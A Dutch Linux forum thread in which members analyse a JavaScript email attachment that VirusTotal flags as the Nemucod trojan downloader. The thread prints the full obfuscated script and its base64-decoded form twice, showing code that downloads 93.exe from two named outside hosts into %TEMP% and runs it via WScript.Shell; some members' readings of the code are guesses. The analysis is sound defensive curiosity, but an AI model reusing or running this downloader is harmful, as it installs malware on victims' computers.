Nieuws:

Welkom, Gast. Alsjeblieft inloggen of registreren.
Heb je de activerings-mail niet ontvangen?

Auteur Topic: De moeite loont? Wie leest een java-script.  (gelezen 775 keer)

Offline Old man

  • Lid
  • Steunpunt: Nee
De moeite loont? Wie leest een java-script.
« Gepost op: 2016/01/26, 10:08:41 »
Zoals ik al eerder vertelde werk ik wel met Windows, maar alleen in VirtualBox. Mailen en Internetten doe ik ik LinuxMint.
Vanmorgen ontving ik een vreemd mailtje dat ik inmiddels aan de ACM (Spamklacht) heb doorgegeven. De afzender was een mij onbekende marg.kuijer@nunog.com . Mijn achternaam is ook kuijer. De site nunog.com bestaat niet. De mail kwam vandaag binnen, maar was gedateerd 16-01. Er stond geen tekst in. Het onderwerp was 1/16/2016 8:01:37 AM. De mail bevatte een .zip bestand als bijlage en in die zip zat een .js bestand (een javascript)
Ik heb wel een vermoeden wat de oorzaak is. Mijn oudste zus heeft de gewoonte allerlei onzinnige "leuke"  :evil: mails rond te sturen, waarbij alle adressen als cc zijn toegevoegd. Na een waarschuwing van mijn kant doet ze dat (soms  :evil: ) als bcc, maar niet altijd....
Toch maar goed dat ik geen mail in Windows ontvang. Ik weet niet wat er zou gebeuren als ik die zip in Windows zou uitpakken want ik lees geen Java. Maar ik ben wel benieuwd wat dat script zou doen. Wie leest hier Java?
Linux Mint 17.3 met Cinnamon 64 bits -> VirtualBox -> Windows 10 op  Acer Aspire V3 771G.

Offline Pjotr

  • Lid
    • http://sites.google.com/site/computertip
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #1 Gepost op: 2016/01/26, 12:07:10 »
Stuur dat zip-bestand eens op naar www.virustotal.com ? Ik ben benieuwd....

Offline Old man

  • Lid
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #2 Gepost op: 2016/01/26, 13:47:20 »
Dit is het Java-script:function k(b){0<=b.indexOf('=')&&(b=b.substr(0,b.indexOf('=')));for(var V=0,H=0,K,m,L,J,P=0,r,u,M='';V<b.length;++V){m='='==b.charAt(V)?0:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.indexOf(b.charAt(V));H=(H+6)%8;if(6!=H){K+=m>>H;if(0==P)J=!0,u=0,L=1,128>K&&(L=0,u=K&64,J=!1);else if(128!=(K&192))return!1;for(r=32;J&&0<r;r>>=1)K&r?++L:J=!1;J||(r=6+6*P-L,6<r&&(r=6),r&&(u+=K%(1<<r)<<6*(L-P)));P==L?(M+=String.fromCharCode(u),P=0):++P}K=H?m%(1<<H)<<8-H:0}return M}function g(F){eval(F);}var t=new Object();t.f='DQoNCmZ1bmN0aW9uIGhmYnVRSW9NTyhXdlpyclVzS3ZCYikgew0KdmFyIEtNellZQlpiID0gV1NjcmlwdC5DcmVhdGVPYmpl';t.n='Y3QoIldzY3JpcHQuU2hlbGwiKTsNCktNellZQlpiLlJ1bihXdlpyclVzS3ZCYiwgMHgxLCAweDApOw0KfQ0KdmFyIHMgPSAiYmVsYWhob2FzdC5uZXQvOTMuZXhlPyBiZWxhaGhvYXN0YmlsLmNvbS85My5leGU/ID8gPyA/Ii5zcGxpdCgiICIpOw0KdmFyIEpWSyA9KCgxLyo3SlhJOTc0MTUzNTk2bjU1MzE3dU0zNTQxOTNlT2laKi8pPyJXU2NyaSI6IiIpKyJwdC5TaGVsbCI7DQp2YXIgS0IgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdChKVkspOw0KdmFyIFdrID0gIiVURU1QJVxcIjsNCnZhciBYb3YgPSBLQi5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoV2spOw0KdmFyIEZtSSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJTY3JpcHRpbmciLypZMG9tenlmWWt6RyovKyIuRmlsZSIrLypLNVhyaG1SKi8iU3lzdGVtT2JqZWN0Iik7DQp2YXIgQ1hiaSA9IFhvdisiYVNac3NuRlxcIjsNCnRyeXsNCkZtSS5DcmVhdGVGb2xkZXIoQ1hiaSk7DQp9Y2F0Y2goSW56aWh0KXsNCn07DQp2YXIgeVlmID0gIjIuWE1MSCI7DQp2YXIgWWhoID0geVlmICsgIlRUUCI7DQp2YXIgTm4gPSB0cnVlICAsIFFaclkgPSAiQURPRCI7DQp2YXIgTGkgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTVMiKyJYTUwiKyg2NDQ2MjAsIFloaCkpOw0KdmFyIHJoSSA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KFFaclkgKyAiQi5TdCIrKDQyMDIyMSwgInJlYW0iKSk7DQp2YXIgSmdTID0gMDsNCnZhciBsID0gMTsNCnZhciBkUVhrSEZOID0gNzU2MzgwOw0KZm9yICh2YXIgVT1KZ1M7IFU8cy5sZW5ndGg7IFUrKykgIHsNCnZhciBaayA9IDA7DQp0cnkgIHsNCnBvaSA9ICJHRVQiOw0KTGkub3Blbihwb2ksImh0dHA6Ly8iK3NbVV0rbCwgZmFsc2UpOyBMaS5zZW5kKCk7IGlmIChMaS5zdGF0dXMgPT0gODA1LTYwNSkgIHsgICAgICANCnJoSS5vcGVuKCk7IHJoSS50eXBlID0gMTsgcmhJLndyaXRlKExpLnJlc3BvbnNlQm9keSk7IGlmIChyaEkuc2l6ZSA+IDI1MTA2OC05NzkpICB7DQpaayA9IDE7IHJoSS5wb3NpdGlvbiA9IDA7IHJoSS5zYXZlVG9GaWxlLypmS2ZWODJUVERyKi8oQ1hiaS8qYjlENDExQnhQMCovK2RRWGtIRk4rIi5leGUiLDQtMik7IHRyeSAgew0KaWYgKCgobmV3IERhdGUoKSk+MCw3ODM0NDIxODg4KSkgew0KaGZidVFJb01PKENYYmkrZFFYa0hGTisvKnQyQng2OGVzY20qLyIuZXhlIi8qcjR1RDkyMFFRQiovKTsgDQpicmVhazsNCn0NCn0NCmNhdGNoIChueSkgIHsNCn07IA0KfTsgcmhJLmNsb3NlKCk7IA0KfTsgDQppZiAoWmsgPT0gMSkgIHsNCkpnUyA9IFU7IGJyZWFrOyANCn07IA0KfQ0KY2F0Y2ggKG55KSAgeyANCn07IA0KfTsgDQoNCg=';if (((new Date())>0,81106)) {g(k(t.f.substring(0,t.f.length)+t.n));}
Ik deed wat jij vroeg, Pjotr. Dit is het resultaat:
Antivirus    Result                                                                    Update
NANO-Antivirus    Trojan.Script.Nemucod.dzmpqx                     20160126
Cyren                   JS/Downldr.CZ.gen    [                                       20160126
Qihoo-360            js.url.downloader.c                                            20160126
Kaspersky            HEUR:Trojan-Downloader.Script.Generic    20160126


De overige 50 virus-scanners herkenden de code niet
Linux Mint 17.3 met Cinnamon 64 bits -> VirtualBox -> Windows 10 op  Acer Aspire V3 771G.

Offline Pjotr

  • Lid
    • http://sites.google.com/site/computertip
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #3 Gepost op: 2016/01/26, 14:01:23 »
Een Trojaan, dus....  =D

Offline niekn

  • Lid
    • omega-xis
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #4 Gepost op: 2016/01/26, 16:14:18 »
jup zie in t script iets wat op base64 lijkt ff door de decoder runnen...
oh verrek t is base64!!

t zijn 2 variabelen (n en f) die aan elkaar geplakt worden als base64-string en dan door de decoder gegooid worden.
function hfbuQIoMO(WvZrrUsKvBb) {
var KMzYYBZb = WScript.CreateObject("Wscript.Shell");
KMzYYBZb.Run(WvZrrUsKvBb, 0x1, 0x0);
}
var s = "belahhoast.net/93.exe? belahhoastbil.com/93.exe? ? ? ?".split(" ");
var JVK =((1/*7JXI974153596n55317uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var KB = WScript.CreateObject(JVK);
var Wk = "%TEMP%\\";
var Xov = KB.ExpandEnvironmentStrings(Wk);
var FmI = new ActiveXObject("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");
var CXbi = Xov+"aSZssnF\\";
try{
FmI.CreateFolder(CXbi);
}catch(Inziht){
};
var yYf = "2.XMLH";
var Yhh = yYf + "TTP";
var Nn = true  , QZrY = "ADOD";
var Li = WScript.CreateObject("MS"+"XML"+(644620, Yhh));
var rhI = WScript.CreateObject(QZrY + "B.St"+(420221, "ream"));
var JgS = 0;
var l = 1;
var dQXkHFN = 756380;
for (var U=JgS; U<s.length; U++)  {
var Zk = 0;
try  {
poi = "GET";
Li.open(poi,"http://"+s[U]+l, false); Li.send(); if (Li.status == 805-605)  {     
rhI.open(); rhI.type = 1; rhI.write(Li.responseBody); if (rhI.size > 251068-979)  {
Zk = 1; rhI.position = 0; rhI.saveToFile/*fKfV82TTDr*/(CXbi/*b9D411BxP0*/+dQXkHFN+".exe",4-2); try  {
if (((new Date())>0,7834421888)) {
hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/);
break;
}
}
catch (ny)  {
};
}; rhI.close();
};
if (Zk == 1)  {
JgS = U; break;
};
}
catch (ny)  {
};
};

blijkbaar verdoezelen ze op deze manier de daadwerkelijke downloadcode.
« Laatst bewerkt op: 2016/01/26, 16:50:42 door niekn »

Offline Old man

  • Lid
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #5 Gepost op: 2016/01/26, 16:23:51 »
Niekn,

Heb je enig idee wat dit scriptje doet? Mijn programmeerkennis reikt niet verder dan VBA.
Of om met Bertje Visser te spreken: Vertel! Vertel!

Bart
Linux Mint 17.3 met Cinnamon 64 bits -> VirtualBox -> Windows 10 op  Acer Aspire V3 771G.

Offline partyrabbit

  • Lid
  • Steunpunt: Ja
Re: De moeite loont? Wie leest een java-script.
« Reactie #6 Gepost op: 2016/01/26, 16:43:16 »
Even een korte reactie uit het blote hoofdje zonder verder uitzoeken.

Hij haalt bestand 93PUNTexe op van belahhoastPUNTnet
En gaat eea installeren waaronder de aanmaak van directory CXbi, waar hij ook een file in aanmaakt.
En hij gaat aan de gang met ActiveX. Wat precies zie ik niet (zal van die exe afhangen) maar ik heb het vermoeden dat je browser overgenomen wordt.
Hij stelt op basis van variabelen nieuwe link(s)s samen en stuurt je naar die pagina('s).

Ik denk dat deze voor nieuwe startpagina's vol reclame gaat zorgen, en ondertussen zich vermenigvuldigd om moeilijk verwijderd te kunnen worden.

ct("Wscript.Shell");
KMzYYBZb.Run(WvZrrUsKvBb, 0x1, 0x0);
}
var s = "[color=red]belahhoast.net/93.exe[/color]? belahhoastbil.com/93.exe? ? ? ?".split(" ");
var JVK =((1/*7JXI974153596n55317uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var KB = WScript.CreateObject(JVK);
var Wk = "%TEMP%\\";
var Xov = KB.ExpandEnvironmentStrings(Wk);
var FmI = new [color=red]ActiveX[/color]Object("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");
var CXbi = Xov+"aSZssnF\\";
try{
FmI.[color=red]CreateFolder(CXbi)[/color];
}catch(Inziht){
};
var yYf = "2.XMLH";
var Yhh = yYf + "TTP";
var Nn = true  , QZrY = "ADOD";
var Li = WScript.CreateObject("MS"+"XML"+(644620, Yhh));
var rhI = WScript.CreateObject(QZrY + "B.St"+(420221, "ream"));
var JgS = 0;
var l = 1;
var dQXkHFN = 756380;
for (var U=JgS; U<s.length; U++)  {
var Zk = 0;
try  {
[color=red]poi = "GET";
Li.open(poi,"http://"+s[U]+l, false); Li.send(); if (Li.status == 805-605)[/color]  {     
rhI.open(); rhI.type = 1; rhI.write(Li.responseBody); if (rhI.size > 251068-979)  {
Zk = 1; rhI.position = 0; rhI.saveToFile/*fKfV82TTDr*/(CXbi/*b9D411BxP0*/+dQXkHFN+".exe",4-2); try  {
if (((new Date())>0,7834421888)) {
hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/);
break;
}
}
catch (ny)  {
};
}; rhI.close();
};
if (Zk == 1)  {
JgS = U; break;
};
}
catch (ny)  {
};
};

Moderator edit: "quote" tag veranderd in "code" tag.
« Laatst bewerkt op: 2016/01/26, 22:36:06 door Ron »
I ♥ Linux
 
"Schroom niet af en toe je kop boven het maaiveld uit te steken. Zulke mensen zijn nodig. Buk gewoon op tijd." --partyrabbit--

Offline niekn

  • Lid
    • omega-xis
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #7 Gepost op: 2016/01/26, 16:44:11 »
veel code is een beetje vaag dus ik zal mijn best doen.

 t maakt een lijst aan van exe bestanden:

var s = "belahhoast.net/93.exe? belahhoastbil.com/93.exe? ? ? ?".split(" ");(split(" ") splitst op spaties, dus je krijgt een lijst van stukjes tekst:
belahhoast.net/93.exe?
belahhoastbil.com/93.exe?
?
?
?
)

ik denk dat dit onze "payload is" dit willen we dat op t slachtoffer word uitgevoerd.

var FmI = new ActiveXObject("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");activeX is de scriptingtaal van internet explorer, ik denk dat men een kwetsbaarheid in active X wil gebruiken om genoemde exe bestanden uit te voeren.

FmI.CreateFolder(CXbi);maakt een map aan op je systeem om alles in te downloaden.
for (var U=JgS; U<s.length; U++)  {dit betekent simplelweg, herhaal alles wat tussen {} staat voor iedere link die in s staat (zie bovenste commando) s is de lijst met exe bestanden die we willen downloaden.
op welk nummer we in de lijst zitten word opgeslagen in U.

dan volgt er een try-blok want het kan zijn dat de server offline is of degene die dit script uitvoert geen internet heeft, in dat geval falen de volgende commando's
poi = "GET";dit betekent dat we aangeven dat we alleen maar iets willen downloaden, als je bijvoorbeeld registreert op een forum of je wilt inloggen dan stuur je data mee dat is een POST, een GET-request zegt dat we alleen maar iets van de server willen hebben, een normaal downloadcommando dus.
Li.open(poi,"http://"+s[U]+l, false);maak een GET-request aan.
Li.send();verzend het naar de server
if (Li.status == 805-605)  {als dat goed is gegaan
rhI.open(); rhI.type = 1;open de "response" (data wat van de server terug komt)
Citaat
rhI.write(Li.responseBody);
en schrijf die data naar een file.
Citaat
if (((new Date())>0,7834421888)) {
als de huidige datum groter is dan 0,7834421888 (neem aan dat dit een unix timestamp is)
hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/); gebeurt dit. ik moet er wel bij vertellen dat alles tussen /* en */ commentaar is en de rest zijn variablenamen. ik denk dat hier de daadwerkelijke naam van de .exe via verschillende base64stukjes in die vars bovenaan aan elkaar geplakt worden en weer gedecodeerd worden om zo het voorheen gedownloade bestand uit te voeren.

de catches eronder zijn error-afhandeling voor het geval er iets misgaat tijdens het proces. ze doen niets, alleen ervoor zorgen dat je browser niet crasht. (verbaast me dat een hacker daaraan denkt!!)

je ziet wel dat degene die t script geschreven heeft heel veel base64 gebruikt om de zooi te verdoezelen en te proberen het ons moeilijk te maken het te lezen.
verder staat er veel stuk tussen commentaar, dat commentaar lijkt ook op base64 maar ik krijg t niet gedecodeerd...
« Laatst bewerkt op: 2016/01/26, 16:52:02 door niekn »

Offline partyrabbit

  • Lid
  • Steunpunt: Ja
Re: De moeite loont? Wie leest een java-script.
« Reactie #8 Gepost op: 2016/01/26, 16:49:25 »
Lol. Tegelijk.

Je vergeet alleen te zeggen wat het doet.
Hij stelt variabele links samen en stuurt je daar naartoe. Dit is zo'n virus wat je browser overneemt met een (wisselende) reclame-startpagina.
« Laatst bewerkt op: 2016/01/26, 16:51:08 door partyrabbit »
I ♥ Linux
 
"Schroom niet af en toe je kop boven het maaiveld uit te steken. Zulke mensen zijn nodig. Buk gewoon op tijd." --partyrabbit--

Offline niekn

  • Lid
    • omega-xis
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #9 Gepost op: 2016/01/26, 16:58:30 »
Lol. Tegelijk.

Je vergeet alleen te zeggen wat het doet.
Hij stelt variabele links samen en stuurt je daar naartoe. Dit is zo'n virus wat je browser overneemt met een (wisselende) reclame-startpagina.

jup je hebt ook zo'n Wscrpit commando:
ct("Wscript.Shell");ik denk dat de W in dit geval voor Windows staat, het active-X gebeuren verderop wijst ook in de richting dat dit een speciaal internet-explorer virus is.

wel grappig dat ze t proberen te verdoezelen met base64 en dan denken dat wij daar niet achter komen.

Offline partyrabbit

  • Lid
  • Steunpunt: Ja
Re: De moeite loont? Wie leest een java-script.
« Reactie #10 Gepost op: 2016/01/26, 20:33:44 »
ik denk dat de W in dit geval voor Windows staat, het active-X gebeuren verderop wijst ook in de richting dat dit een speciaal internet-explorer virus is.

93PUNTexe zegt ook wel genoeg denk ik.  ^-^
I ♥ Linux
 
"Schroom niet af en toe je kop boven het maaiveld uit te steken. Zulke mensen zijn nodig. Buk gewoon op tijd." --partyrabbit--

Offline pederoco

  • Lid
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #11 Gepost op: 2016/01/26, 21:27:48 »
En dus voor Old Man te spreken, wat is dit dus nu zonder franje!
mvg,  Peter
Desktop: xubuntu 16.04.4 / xubuntu-minimal 18.04
Laptop: xubuntu-minimal 16.04.4 / xubuntu 18.04
"No windows in the house but somehow there's more light..."

Offline Ron

  • Forumteam
    • r0n
    • Dwarsligger
  • Steunpunt: Ja
Re: De moeite loont? Wie leest een java-script.
« Reactie #12 Gepost op: 2016/01/26, 22:39:56 »
wijst ook in de richting dat dit een speciaal internet-explorer virus is.
Heb ik alweer geen mogelijkheid om een virus op mijn laptop te krijgen.
Wat is mijn systeem weer gezond :lol:
OpenStandaard evangelist, OpenSource promotor, OpenData liefhebber.
Xubuntu gebruiker en voorstander (XFCE).
In Nederland bekend als een Dwarsligger.

Offline niekn

  • Lid
    • omega-xis
  • Steunpunt: Nee
Re: De moeite loont? Wie leest een java-script.
« Reactie #13 Gepost op: 2016/02/01, 12:30:10 »
En dus voor Old Man te spreken, wat is dit dus nu zonder franje!

iets wat een .exe download en op je pc via een lek in activeX probeert uit te voeren.